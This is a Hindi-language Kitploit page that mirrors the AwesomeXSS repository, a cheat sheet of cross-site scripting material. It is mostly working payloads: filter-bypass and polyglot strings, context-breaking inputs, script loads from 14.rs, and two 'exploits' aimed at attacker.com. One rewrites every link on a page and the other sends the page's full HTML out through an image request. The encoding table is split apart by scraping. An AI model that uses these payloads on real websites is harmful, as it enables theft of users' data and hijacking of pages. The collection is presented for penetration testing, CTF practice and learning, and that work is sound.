Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
AwesomeXSS — अद्भुत XSS सामग्री | Kitploit
उपकरण/GitHubGitHub/s0md3v/awesomexss
पेलोड जनरेशनWAF बाईपासवेब सुरक्षाCTFपेपर और शोधलर्निंग और शिक्षाचयनित संसाधनलर्निंग पाथ और कोर्सलैब और अभ्यास
GitHubs0md3v/awesomexss

AwesomeXSS

अद्भुत XSS सामग्री

रिपॉजिटरी देखें
5.1k782101 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

अद्भुत XSS

यह रिपॉजिटरी अद्भुत XSS संसाधनों का एक संग्रह है। योगदान का स्वागत है और इसे एक मुद्दे के माध्यम से प्रस्तुत किया जाना चाहिए।

अद्भुत सामग्री

  • चुनौतियाँ
  • पठन एवं प्रस्तुतियाँ
  • उपकरण
  • माइंड मैप्स
  • DOM XSS
  • पेलोड
  • पॉलीग्लॉट्स
  • टैग और घटना हैंडलर्स
  • संदर्भ तोड़ना
    • HTML संदर्भ
    • एट्रीब्यूट संदर्भ
    • JavaScript संदर्भ
  • कन्फर्म वेरिएंट
  • एक्सप्लॉइट्स
  • जांच
  • बायपासिंग
  • एन्कोडिंग
  • टिप्स और ट्रिक्स
  • अद्भुत चुनौतियाँ

    • prompt.ml
    • alf.nu/alert1
    • xss-game.appspot.com
    • polyglot.innerht.ml
    • sudo.co.il/xss
    • root-me.org
    • chefsecure.com
    • wechall.net
    • codelatte.id/labs/xss

    अद्भुत पठन एवं प्रस्तुतियाँ

    • XSS डिटेक्शन मैकेनिज़्म को बायपास करना
    • PNG कंटेंट टाइप के माध्यम से Facebook में XSS
    • मैं आपकी गर्लफ्रेंड से कैसे मिला
    • एक घंटे में 1,352 वर्डप्रेस XSS प्लगिन कमजोरियाँ कैसे खोजें
    • ब्लाइंड XSS
    • कॉपी पेस्ट

    अद्भुत उपकरण

    • XSStrike
    • BeEF
    • JShell

    अद्भुत XSS माइंड मैप्स

    जैक मासा द्वारा एक सुंदर XSS माइंड मैप, यहाँ

    अद्भुत DOM XSS

    • क्या आपका इनपुट किसी सिंक में जाता है? असुरक्षित
    • नहीं जाता? असुरक्षित नहीं

    स्रोत: एक इनपुट जिसे बाहरी (अविश्वसनीय) स्रोत द्वारा नियंत्रित किया जा सकता है।

    root@kitploit:~
    document.URL
    document.documentURI
    document.URLUnencoded (IE 5.5 या बाद का Only)
    document.baseURI
    location
    location.href
    location.search
    location.hash
    location.pathname
    document.cookie
    document.referrer
    window.name
    history.pushState()
    history.replaceState()
    localStorage
    sessionStorage
    

    सिंक: एक संभावित खतरनाक विधि जो कमजोरी का कारण बन सकती है। इस मामले में एक DOM आधारित XSS।

    root@kitploit:~
    eval
    Function
    setTimeout
    setInterval
    setImmediate
    execScript
    crypto.generateCRMFRequest
    ScriptElement.src
    ScriptElement.text
    ScriptElement.textContent
    ScriptElement.innerText
    anyTag.onEventName
    document.write
    document.writeln
    anyElement.innerHTML
    Range.createContextualFragment
    window.location
    document.location
    

    यह व्यापक सूची सिंक और स्रोतों की domxsswiki से ली गई है।

    अद्भुत पेलोड

    root@kitploit:~
    <A/hREf="j%0aavas%09cript%0a:%09con%0afirm%0d``">z
    <d3"<"/onclick="1>[confirm``]"<">z
    <d3/onmouseenter=[2].find(confirm)>z
    <details open ontoggle=confirm()>
    <script y="><">/*<script* */prompt()</script
    <w="/x="y>"/ondblclick=`<`[confir\u006d``]>z
    <a href="https://github.com/s0md3v/awesomexss/blob/master/javascript%26colon%3Balert%281%29">click
    <a href=javas&#99;ript:alert(1)>click
    <script/"<a"/src=data:=".<a,[8].some(confirm)>
    <svg/x=">"/onload=confirm()//
    <--` --!>
    <svg%0Aonload=%09((pro\u006dpt))()//
    <sCript x>(((confirm)))``</scRipt x>
    <svg </onload ="1> (_=prompt,_(1)) "">
    <!--><script src=//14.rs>
    <embed src=//14.rs>
    <script x=">" src=//15.rs></script>
    <!'/*"/*/'/*/"/*--></Script><Image SrcSet=K */; OnError=confirm`1` //>
    x
    <svg onload=write()>
    

    अद्भुत पॉलीग्लॉट्स

    यहाँ एक XSS पॉलीग्लॉट है जो मैंने बनाया है जो 20+ संदर्भों से बाहर निकल सकता है:

    root@kitploit:~
    %0ajavascript:`/*\"/*-->&lt;svg onload='/*</template></noembed></noscript></style></title></textarea></script><html onmouseover="/**/ alert()//'">`
    

    यह कैसे काम करता है इसकी व्याख्या, यहाँ

    अद्भुत टैग और घटना हैंडलर्स

    • विवरण सहित 105 इवेंट हैंडलर्स
    • बिना विवरण के 200 इवेंट हैंडलर्स

    कुछ कम पहचाने गए इवेंट हैंडलर्स

    root@kitploit:~
    ontoggle
    onauxclick
    ondblclick
    oncontextmenu
    onmouseleave
    ontouchcancel
    

    कुछ HTML टैग जिनका आप उपयोग करेंगे

    root@kitploit:~
    img
    svg
    body
    html
    embed
    script
    object
    details
    isindex
    iframe
    audio
    video
    

    अद्भुत संदर्भ तोड़ना

    HTML संदर्भ

    केस: <tag>You searched for $input. </tag>

    root@kitploit:~
    <svg onload=alert()>
    </tag><svg onload=alert()>
    

    एट्रीब्यूट संदर्भ

    केस: <tag attribute="$input">

    root@kitploit:~
    "><svg onload=alert()>
    "><svg onload=alert()><b attr="
    " onmouseover=alert() "
    "onmouseover=alert()//
    "autofocus/onfocus="alert()
    

    JavaScript संदर्भ

    केस: <script> var new something = '$input'; </script>

    root@kitploit:~
    '-alert()-'
    '-alert()//'
    '}alert(1);{'
    '}%0Aalert(1);%0A{'
    </script><svg onload=alert()>
    

    अद्भुत कन्फर्म वेरिएंट

    हाँ, कन्फर्म क्योंकि अलर्ट बहुत मुख्यधारा है।

    root@kitploit:~
    confirm()
    confirm``
    (confirm``)
    {confirm``}
    [confirm``]
    (((confirm)))``
    co\u006efirm()
    new class extends confirm``{}
    [8].find(confirm)
    [8].map(confirm)
    [8].some(confirm)
    [8].every(confirm)
    [8].filter(confirm)
    [8].findIndex(confirm)
    

    अद्भुत एक्सप्लॉइट्स

    सभी लिंक बदलें
    root@kitploit:~
    Array.from(document.getElementsByTagName("a")).forEach(function(i) {
      i.href = "https://attacker.com";
    });
    
    सोर्स कोड चुराने वाला
    root@kitploit:~
    <svg/onload="(new Image()).src='//attacker.com/'%2Bdocument.documentElement.innerHTML">
    

    अद्भुत जांच

    यदि इसमें से कुछ भी काम नहीं करता है, तो अद्भुत बायपासिंग अनुभाग देखें

    सबसे पहले, एक गैर-दुर्भावनापूर्ण स्ट्रिंग दर्ज करें जैसे d3v और स्रोत कोड देखकर प्रतिबिंबों की संख्या और संदर्भों का अंदाजा लगाएं।
    अब एट्रीब्यूट संदर्भ के लिए, जाँचें कि क्या डबल कोट्स (") को फ़िल्टर किया जा रहा है, x"d3v दर्ज करके। यदि यह x&quot;d3v में बदल जाता है, तो संभावना है कि आउटपुट ठीक से एस्केप हो रहा है। यदि ऐसा होता है, तो सिंगल कोट्स (') के लिए भी ऐसा ही करने का प्रयास करें x'd3v दर्ज करके, यदि यह x&apos; में बदल जाता है, तो आप बर्बाद हैं। एकमात्र चीज़ जो आप आज़मा सकते हैं वह एन्कोडिंग है।
    यदि कोट्स फ़िल्टर नहीं किए जा रहे हैं, तो आप बस अद्भुत संदर्भ तोड़ना अनुभाग से पेलोड आज़मा सकते हैं।
    जावास्क्रिप्ट संदर्भ के लिए, जाँचें कि कौन से कोट्स का उपयोग किया जा रहा है, उदाहरण के लिए यदि वे कर रहे हैं

    root@kitploit:~
    variable = 'value' या variable = "value"
    

    अब मान लें कि सिंगल कोट्स (') का उपयोग हो रहा है, तो x'd3v दर्ज करें। यदि यह x\'d3v में बदल जाता है, तो बैकस्लैश () को एस्केप करने का प्रयास करें अपने प्रोब में एक बैकस्लैश जोड़कर यानी x\'d3v. यदि यह काम करता है तो निम्नलिखित पेलोड का उपयोग करें:

    root@kitploit:~
    \'-alert()//
    

    लेकिन यदि यह x\\\'d3v में बदल जाता है, तो एकमात्र चीज़ जो आप आज़मा सकते हैं वह है स्क्रिप्ट टैग को स्वयं बंद करना:

    root@kitploit:~
    </script><svg onload=alert()>
    

    सरल HTML संदर्भ के लिए, प्रोब x<d3v है। यदि यह x&gt;d3v में बदल जाता है, तो उचित स्वच्छता मौजूद है। यदि यह ज्यों का त्यों दिखाई देता है, तो संभावित फिल्टर की जांच के लिए एक डमी टैग दर्ज करें। मुझे जो डमी टैग पसंद है वह x<xxx> है। यदि यह किसी भी तरह से हटा या बदला जाता है, तो इसका मतलब है कि फिल्टर < और > की जोड़ी ढूंढ रहा है। इसे आसानी से बायपास किया जा सकता है:

    root@kitploit:~
    <svg onload=alert()//
    

    या यह (सभी मामलों में काम नहीं करेगा)

    root@kitploit:~
    <svg onload=alert()
    

    यदि आपके डमी टैग स्रोत कोड में ज्यों के त्यों आते हैं, तो इनमें से किसी भी पेलोड का उपयोग करें:

    root@kitploit:~
    <svg onload=alert()>
    <embed src=//14.rs>
    <details open ontoggle=alert()>
    

    अद्भुत बायपासिंग

    नोट: इनमें से कोई भी पेलोड सिंगल (') या डबल कोट्स (") का उपयोग नहीं करता है।

    • इवेंट हैंडलर्स के बिना
    root@kitploit:~
    <object data=javascript:confirm()>
    <a href=javascript:confirm()>यहाँ क्लिक करें
    <script src=//14.rs></script>
    <script>confirm()</script>
    
    • स्पेस के बिना
    root@kitploit:~
    <svg/onload=confirm()>
    
    
    • स्लैश (/) के बिना
    root@kitploit:~
    <svg onload=confirm()>
    
    
    • बराबर चिह्न (=) के बिना
    root@kitploit:~
    <script>confirm()</script>
    
    • बिना बंद कोण ब्रैकेट (>)
    root@kitploit:~
    <svg onload=confirm()//
    
    • अलर्ट, कन्फर्म, प्रॉम्प्ट के बिना
    root@kitploit:~
    <script src=//14.rs></script>
    <svg onload=co\u006efirm()>
    <svg onload=z=co\u006efir\u006d,z()>
    
    • बिना मान्य HTML टैग के
    root@kitploit:~
    <x onclick=confirm()>यहाँ क्लिक करें
    <x ondrag=aconfirm()>इसे खींचें
    
    • टैग ब्लैकलिस्टिंग को बायपास करें
    root@kitploit:~
    </ScRipT>
    </script
    </script/>
    </script x>
    

    अद्भुत एन्कोडिंग

    HTMLचारसंख्यात्मकविवरणहेक्सCSS (ISO)JS (ऑक्टल)URL
    &quot;"&#34;उद्धरण चिह्नu+0022\0022\42%22
    &num;#&#35;संख्या चिह्नu+0023\0023\43%23
    &dollar;$&#36;डॉलर चिह्नu+0024\0024\44%24
    &percnt;%&#37;प्रतिशत चिह्नu+0025\0025\45%25
    &amp;&&#38;एम्परसेंडu+0026\0026\46%26
    &apos;'&#39;अपोस्ट्रॉफीu+0027\0027\47%27
    &lpar;(&#40;बायाँ कोष्ठकu+0028\0028\50%28
    &rpar;)&#41;दायाँ कोष्ठकu+0029\0029\51%29
    &ast;*&#42;तारांकनu+002A\002a\52%2A
    &plus;+&#43;जोड़ चिह्नu+002B\002b\53%2B
    &comma;,&#44;अल्पविरामu+002C\002c\54%2C
    &minus;-

    अद्भुत टिप्स और ट्रिक्स

    • http(s):// को // या /\\ या \\ में छोटा किया जा सकता है।
    • document.cookie को cookie में छोटा किया जा सकता है। यह अन्य DOM ऑब्जेक्ट पर भी लागू होता है।
    • अलर्ट और अन्य पॉप-अप फ़ंक्शन को किसी मान की आवश्यकता नहीं है, इसलिए alert('XSS') करना बंद करें और alert() करना शुरू करें।
    • आप टैग बंद करने के लिए > के बजाय // का उपयोग कर सकते हैं।
    • मैंने पाया है कि confirm सबसे कम पहचाना जाने वाला पॉप-अप फ़ंक्शन है, इसलिए alert का उपयोग बंद करें।
    • एट्रीब्यूट मान के आसपास उद्धरण आवश्यक नहीं हैं जब तक कि इसमें स्पेस न हों। आप <script src=//14.rs> का उपयोग कर सकते हैं <script src="//14.rs"> के बजाय।
    • सबसे छोटा HTML संदर्भ XSS पेलोड <script src=//14.rs> (19 वर्ण) है।

    अद्भुत श्रेय

    जब तक निर्दिष्ट न किया जाए, सभी पेलोड मेरे द्वारा बनाए गए हैं।

    टूल डाउनलोड करें
    &#45;
    हाइफन-माइनस
    u+002D
    \002d
    \55
    %2D
    &period;.&#46;पूर्ण विराम; अवधिu+002E\002e\56%2E
    &sol;/&#47;सॉलिडस; स्लैशu+002F\002f\57%2F
    &colon;:&#58;कोलनu+003A\003a\72%3A
    &semi;;&#59;अर्धविरामu+003B\003b\73%3B
    &lt;<&#60;से कमu+003C\003c\74%3C
    &equals;=&#61;बराबरu+003D\003d\75%3D
    &gt;>&#62;से बड़ा चिह्नu+003E\003e\76%3E
    &quest;?&#63;प्रश्न चिह्नu+003F\003f\77%3F
    &commat;@&#64;एट चिह्न; व्यावसायिक एटu+0040\0040\100%40
    &lsqb;[&#91;बायाँ वर्ग कोष्ठकu+005B\005b\133%5B
    &bsol;\&#92;बैकस्लैशu+005C\005c\134%5C
    &rsqb;]&#93;दायाँ वर्ग कोष्ठकu+005D\005d\135%5D
    &Hat;^&#94;सर्कमफ्लेक्स उच्चारणu+005E\005e\136%5E
    &lowbar;_&#95;निम्न रेखाu+005F\005f\137%5F
    &grave;`&#96;ग्रेव उच्चारणu+0060\0060\u0060%60
    &lcub;{&#123;बायाँ घुंघराला कोष्ठकu+007b\007b\173%7b
    &verbar;|&#124;ऊर्ध्वाधर रेखाu+007c\007c\174%7c
    &rcub;}&#125;दायाँ घुंघराला कोष्ठकu+007d\007d\175%7d